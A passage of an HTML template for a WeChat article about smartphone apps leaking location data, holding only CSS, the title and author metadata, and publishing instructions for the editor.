body { max-width: 640px; margin: 0 auto; padding: 16px; font-family: -apple-system, BlinkMacSystemFont, 'PingFang SC', 'Microsoft YaHei', sans-serif; background: #fff; color: #333; }
a { color: #1a6dff; }
</style>
</head>
<body>
<!--
微信公众号文章 HTML
标题位置被秒偷10亿人每天在用的App17个「正常功能」细思极恐
作者Innora AI 安全研究
日期2026-03-11
使用说明:
1. 在微信公众号后台点击「新建图文」
2. 点击编辑器右上角「</>」进入 HTML 模式
3. 复制 <section id="article"> 到 </section> 之间的全部内容粘贴
微信公众号发布说明:
1. 在微信公众号后台 → 新建图文
2. 编辑器右上角「</>」进入 HTML 模式
3. 复制下方 <section id="article"> 到对应 </section> 之间的全部内容粘贴
4. 切换回可视化模式检查排版
5. 设置标题位置被秒偷10亿人每天在用的App17个「正常功能」细思极恐
6. 发布
@@ -390,3 +397,5 @@
</section>
</section>
</body>
</html>